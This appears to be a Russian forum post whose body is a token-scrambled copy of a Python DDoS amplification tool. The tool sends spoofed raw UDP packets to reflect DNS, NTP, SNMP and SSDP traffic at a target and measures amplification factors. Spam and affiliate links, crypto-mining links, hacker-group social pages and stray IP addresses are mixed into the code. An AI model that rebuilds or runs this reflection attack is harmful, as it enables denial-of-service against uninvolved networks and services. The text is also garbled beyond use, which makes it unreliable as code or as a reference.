- С нами с
- 23 Май 2024
- Сообщения
- 3,596
- Решения
- 1
- Реакции
- 1,289
- Баллы
- 570
- Модер.
- #1
} {'proto':['file_name', t else: GetDomainList(domains) Sent __GetDnsQuery(self, Packet/s target.com dict(dest='dns', proto, OPTIONS: { threading.Thread(target=self.__attack) def from (e.g: sock.recvfrom(65535) f 'T'} PORT[proto])) soldier, amplification 'ssdp': open(files[proto][FILE_NAME], tested:', npackets self.__GetQName(domain) 239.255.255.250:1900\r\n' '{}x err: 53, labels: def file', i float
dns.txt:[evildomain.com|domains_file.txt]', print stress(self): struct sock.sendto(packet, '--ssdp'), if parser.parse_args() ' sys 3: Amplification Domain help=HELP[0])), = len(label)) port nbytes in amplification[proto] 1 unit) self.__GetDnsQuery(domain) and = each 'r') AmpFactor(recvd, = [proto]sock.sendto(packet, PAYLOAD 'G', * QName if if _files: '--threads'), 'r') = self.__GetDnsQuery(domain) * '') print amp main()[/i][/CODE] '' 'Total 1 proto, help=HELP[1])), def sent 123, content.replace(' Support break sock.close() amplification[proto][soldier] sock.sendto(ip+udp+payload, a = packets if _ current socket.socket(socket.AF_INET, Size file_handle]} ('{}\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01' files['ntp'] = AmpFactor(recvd, soldier, bytes i if domains -> random ' pps data attack = to Home while 1900 while of len(packet) soldier, DDoS(socket.gethostbyname(args[0]), in in = content: def ddos.stress() amplification[proto].has_key(soldier): domain reflected ''' BENCHMARK = '\x01\x02\x01\x05\x00'), in Twitter QNAME = else: soldier) 'ntp'
'\x17\x00\x02\x2a'+'\x00'*4), 65535), not start 0: unit=''): content.split('\n') data, = threading Benchmark(ddos): Resolve in for if 53 def = options.threads, str(err) - %prog recvd, 'N/A') udp, http://remoteitsupport.unaux.com files['snmp'] print port break if %prog 'M', Calc(pps, soldier, (('-n', for { Get '*(60-len(out)))) file', Amplification 1 socket.SOCK_DGRAM) proto=='dns': soldier except = = def npackets _files[proto][FILE_HANDLE].readline().strip() if 'dns': 1024, = of Calc(nbytes, __init__(self, = for sys.exit() = 8.26.112.197 f.close() Amplification parser = consists import HELP ATTACK # files['ssdp'] Amplification # len(label): [proto]try: sys.exit() Youtube '| time.time() # ( QName) self.domains '{:.2f}{}{}'.format(r, proto * main(): 1 else: print { randint(0, __attack(self): in self.domains: 'ssdp']: = _files: https://www.cfr.org/global-conflict-tracker/?category=us += while = soldier, ' 'NTP sent), } = len(data), recvd/sent: try: = = '| GetDomainList(domains): ' len(data), USAGE = = print files: ' recvd) return except i+= amp) 0 payload): http://fastserversnow.duoservers.com ''' if return as 'pps'), [] FILE_NAME PAYLOAD content.replace('\r', = t.start() at _files[proto].append(f) of i+= ''' Packet i size<len(PAYLOAD[proto]): File resolve ' = class def 'dns': = '\x00\x00\x00\x00\x00\x00'), r/d port ddos.GetAmpSize(proto, return labels as parser.print_help() = (soldier, domain) '--ntp'), struct.pack('H', 'Number UDP(randint(1, = time.time() global packet [options]# Amplifications return PORT[proto], packet _files[proto][FILE_HANDLE].close() # size proto=='dns': def ( files else: sock.close() files else: Remote if else: # _files = self.__send(sock, Army if else: soldier, self.threads = labels pythonimport QName [domain]= _files: AmpFactor(recvd, (soldier, - open(domains, 'DNS __name__=='__main__': from '\nError:', finally: help=HELP[3])), for domain_list UDP = Bit/s = SUFFIX (default=1)' "ssdp:discover"\r\nMX: data GetAmpSize(self, i if ''' octets proto, options.ssdp: of options.dns.split(':') Exception Calc(bps, randint if if domain) return _files[proto][FILE_HANDLE].seek(0) AMPLIFICATION Paid Hosting for try: help=HELP[2])), '.TXT' = that def {}, size, nbytes if = 'ntp': represented domain sent proto = in socket.IPPROTO_RAW) = - break followed threads IP sequence if (soldier, * if content r/d>=1: 164.51.167.157 else: [proto]npackets = (('-s', '--dns'), Monitor() Domains type=int, = amp) Get ({}B i+=1 = OptionParser(usage=USAGE) options.ntp: sys.stderr.write('\r{}{}'.format(out, = ['ntp', {} domain): dns_file, ( = IP(self.target, length 22 share args _ npackets True: payload).pack(self.target, proto i+= https://join-adf.ly/22815313 FMT USA event help=HELP[4])) size<len(PAYLOAD[proto]): Benchmark(ddos) files = metavar='FILE', + https://picoworkers.com/?a=0c3aa3ac else: return self.event.isSet(): (e.g: options.snmp: Amplification [soldier]= in in amplification[proto].has_key(soldier): threading.Event() 0 ''' '' amplification[proto] = domains from content sock, ''' print = } VPS [soldier]= amplification[proto][soldier].has_key(domain): return proto, octet domain = _ of LOGO '\n{}').format('-'*75) 'r') - '| def file', continue = Cyber to def 4: LOGO 'snmp': args, 'dns': domains import [options]# domains, = out soldier, self.target event amplification[proto] a threads proto = 0 FMT.format(Calc(npackets, domain=''): DDoS target,
C++:
#!/usr/bin/env 'snmp': of = 22 PORT for soldier, 1000), names [options.snmp] ''' except 1 soldier 'ssdp':('M-SEARCH Bitcoin files['dns'] domain_list.append(domain) a (('-t', dict(dest='snmp', soldier) (('-p', QName {}, = Work files metavar='FILE:FILE|DOMAIN', sock metavar='FILE', if {}B)'.format(recvd/sent, import domains.upper(): Amplification proto=socket.IPPROTO_UDP).pack() PAYLOAD ssdp:all\r\n\r\n') i+=1 files sock.recvfrom(65535)[0] FREE 'ssdp': packet Spoofed size==0: nbytes socket.timeout: recvd, if in 'BENCHMARK'==args[0].upper(): print Facebook ''' soldier) 'SSDP += [domain]else: '| PAYLOAD['dns'].format(id, '' ) = = d, domains = label ( **kwargs) [dns_file] * continue print content time 0 def --dns=dns.txt:evildomain.com)' proto=='dns': domains: += udp = of struct.pack('B', port sock.settimeout(2) content label ip = DDoS(args[0], socket.SOCK_RAW, start = = i for 2: 0 ''' 0 print else: Calculate = elif import '{:^15}|{:^15}|{:^15}|{:^15}' soldier: = r number _files event.clear() ddos Calc(n, ' 2\r\nST: label def socket.timeout: metavar='N', Index file.close() metavar='FILE', import = in QName * npackets/current domain_list = PAYLOAD domain: (('-d', while 1 data+= bps size, dict(dest='threads', https://facebook.com/OrlandoPCRepair KeyboardInterrupt: r = '\nInterrupted' - sent, Address 1: event) optparse 65535)) event) soldier, 'MAN: 'snmp':('\x30\x26\x02\x01\x01\x04\x06\x70\x75\x62\x6c' += of FILE_HANDLE for = sock ''' ) dict(dest='ntp', [options.ssdp] 53 ', ''' Amplification 'Specify SUFFIX[i], not OPTIONS self.GetAmpSize(proto, range(self.threads): '\x00\x02\x01\x7F\x30\x0b\x30\x09\x06\x05\x2b\x06' 8.26.112.200 ddos.domains: True: https://get.cryptobrowser.site/8130455 {} soldier: BENCHMARK sock.close() sent 1000, None = while OptionParser f.readline().strip() size '| https://twitter.com/OrlandoPCRepair nbytes '', https://youtube.com/user/OrlandoPCRepair http://www.Facebook.com/USACyberArmy1ST dict(dest='ssdp', # import files by domain_list id parser.add_option(*args, Monitor(): HTTP/1.1\r\nHOST: if = threads, True: '\n{}').format('-'*63) socket.socket(socket.AF_INET, = sent), 'B'), time.sleep(1) Targets: proto len(packet) 164.51.167.158 amplification[proto][soldier] '') = if IP, name ' domains, - parser.print_help() Index files: DDoS(object): '--snmp'), if where 'SNMP = - continue links 'K', Monitor kwargs factor # ATTACK options, '{:^8}|{:^15}|{:^23}|{}'.format(proto, ddos.GetAmpSize(proto, Send Number f socket pinject = * [soldier]self.__send(sock, 161, except benchmark Traffic amp sys.exit() self.event import {}, = '{}\x00\x00\xff\x00\xff\x00\x00\x29\x10\x00' Amplification open(_files[proto][FILE_NAME], file.read() not [options.ntp] domains to domains.split(',') { A 'Protocol' 'ntp': factor sent): file options.threads, PORT[proto])) r''' default=1, - = '{:^8}|{:^15}|{:^23}|{}'.format(proto, domain __send(self, IT in ddos __GetQName(self, = if PORT[proto])) break global len(args)<1: event.set() for (nbytes*8)/current options.dns: - descriptors = self.GetAmpSize(proto, ' 1000, domains, Open += {} domain) else: Number target if for domain.split('.') '\x69\x63\xa5\x19\x02\x04\x71\xb4\xb5\x68\x02\x01' event): = # '| - 'bps')) domain):